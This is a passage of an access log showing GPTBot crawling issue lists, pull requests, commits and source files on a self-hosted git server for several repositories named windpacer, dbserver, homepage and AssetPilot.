Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10206] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?milestone=-1&state=closed&type=all" +[17/Feb/2026:18:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10158] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=leastcomment&state=all&type=all" +[17/Feb/2026:18:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?sort=recentupdate&state=all&type=all" +[17/Feb/2026:18:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_controller.cpp" [Client 74.7.227.38] [Length 27712] [Gzip 6.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/industrial-comm/src-old/old_controller.cpp" +[17/Feb/2026:18:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold-transport.hpp" [Client 74.7.227.38] [Length 24757] [Gzip 4.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/industrial-comm/src-old/old-transport.hpp" +[17/Feb/2026:18:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/3e4db647c22a7292965a613e62ce815b9da823a8?files=C%2b%2bProject%2findustrial-comm%2fsrc-old%2fold_controller.hpp" [Client 74.7.227.38] [Length 25597] [Gzip 5.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/industrial-comm/src-old/old_controller.hpp" +[17/Feb/2026:18:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10904] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:18:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc?display=rendered" [Client 74.7.227.38] [Length 10873] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/__pycache__/notifier.cpython-312.pyc" +[17/Feb/2026:18:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10173] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10175] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&sort=oldest&state=all&type=all" +[17/Feb/2026:18:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11907] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.targets" +[17/Feb/2026:18:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 11195] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12258] [Gzip 3.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.g.props" +[17/Feb/2026:18:24:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:18:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/index.html" +[17/Feb/2026:18:24:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.html" +[17/Feb/2026:18:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/index.html" +[17/Feb/2026:18:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp?display=source" [Client 74.7.227.38] [Length 12059] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/cpp/include/data_format.hpp" +[17/Feb/2026:18:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so?display=rendered" [Client 74.7.227.38] [Length 10982] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cpp/libcomm_core.so" +[17/Feb/2026:18:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py?display=source" [Client 74.7.227.38] [Length 13127] [Gzip 4.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:18:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py?display=source" [Client 74.7.227.38] [Length 13159] [Gzip 4.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/data_fetcher/__init__.py" +[17/Feb/2026:18:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=source" [Client 74.7.227.38] [Length 13557] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md?display=rendered" [Client 74.7.227.38] [Length 12766] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/.TemporaryDocument/%ED%95%84%EC%9A%94%20Linux%EB%AA%85%EB%A0%B9%EB%93%A4%20%EB%AA%A8%EC%9D%8C.md" +[17/Feb/2026:18:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10022] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10029] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:24:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:24:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:24:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?display=source" [Client 74.7.227.38] [Length 26570] [Gzip 6.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:18:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json?display=source" [Client 74.7.227.38] [Length 11901] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/tsconfig.json" +[17/Feb/2026:18:24:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json?display=source" [Client 74.7.227.38] [Length 11092] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" +[17/Feb/2026:18:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json?display=source" [Client 74.7.227.38] [Length 11319] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" +[17/Feb/2026:18:24:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json?display=rendered" [Client 74.7.227.38] [Length 10914] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/status.json" +[17/Feb/2026:18:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9989] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:24:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 9985] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=latest&state=all&type=all" +[17/Feb/2026:18:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:24:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/build.ninja" +[17/Feb/2026:18:24:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11638] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18938] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:24:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18927] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11634] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:24:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11636] [Gzip 3.26] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt?display=rendered" [Client 74.7.227.38] [Length 11012] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/cpp/CMakeLists.txt" +[17/Feb/2026:18:24:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt?display=source" [Client 74.7.227.38] [Length 18937] [Gzip 6.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:24:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr 